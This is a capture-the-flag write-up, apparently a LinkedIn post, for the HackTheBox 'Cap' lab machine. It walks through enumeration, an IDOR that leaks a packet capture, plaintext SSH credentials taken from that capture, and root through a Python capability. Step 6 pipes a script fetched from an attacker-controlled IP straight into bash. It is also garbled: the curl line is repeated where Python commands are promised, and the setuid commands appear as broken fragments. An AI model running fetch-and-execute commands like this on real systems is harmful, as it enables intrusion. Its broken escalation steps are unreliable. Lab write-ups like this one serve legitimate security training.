HackTheBox machine "Cap"
Dharmendra Kumar
Cybersecurity Enthusiast | CTF Player | Security Researcher |Jr Penetration tester| VAPT | Data Structures & Algorithms | C & Python Programming
Description
The machine "Cap" is a Linux-based system classified as easy difficulty. It hosts an HTTP server designed for administrative tasks, one of which includes network capture functionality. However, weak security controls lead to an Insecure Direct Object Reference (IDOR) vulnerability. This vulnerability allows an unauthorized user to access network captures belonging to other users. Upon analyzing the capture file, plaintext credentials are discovered, enabling the attacker to gain an initial foothold on the system. To escalate privileges and gain root access, a specific Linux capability is exploited, which further highlights the misconfigurations present in the system.
??Skills Required
- web enumeration
- Packet Capture Analysis
??Skills Learned
- IDOR
- Exploit Linux Capabilites
Analysis
Step:-1 This nmap command is to run a scan on the 10.129.17.215 IP address and includes the following options:
-Pn: Bypass the ping scan and do port scanning directly, assuming all hosts are live.
-sC: Run the default scripts, which are standard security tests and other common scripts by nmap.
-sV: Do service version scanning, which will reveal which services and their versions are running on which ports.
Step:-2 FTP (File transfer Protocol)
Let's check if FTP allows anonymous access .
Step:-3 HTTP (Hyper text Transfer protocol)
Nmap shows that port 80 is running Gunicorn, a Python-based HTTP server. When we visit the page, it loads a dashboard.
领英推è
Browsing to the IP Config page reveals the output of ifconfig
Similarly, the Network Status page reveals the output for netstat . This suggests that the application is executing system commands. Clicking on the Security Snapshot menu item pauses the page for a few seconds and returns a page as shown below.
Step:-4 There was some data in the /data/0 lets download the pcap and analyze it using the wireshark.
Step:-5 The traffic is not encrypted, allowing us to retrieve the user credentials i.e. nathan / Buck3tH4TF0RM3! . These are found to be valid not only for FTP but can be used to login via SSH.
Step:-6 Privilege Escalation
From our shell on Cap, we can fetch linpeas.sh with curl and pipe the output directly into bash to execute it
curl https://10.10.14.24/linpeas.sh | bash
The following Python commands will result in a root shell: curl https://10.10.14.24/linpeas.sh | bash
- os.setuid()
- import os os.setuid(0)
- os.system("/bin/bash")
It calls which is used to modify the process user identifier (UID).
Thankyou for visting
Cybersecurity | Soc Analyst | Penetration Test | Ethical Hacking | Python Dev | Web3 |Blockchian | Financial Analyst | Linux System
6 个月Great work
C ||Java ||Python || DSA ll HTML || CSS ||Networking || Cybersecurity enthusiasm
6 个月Very helpful!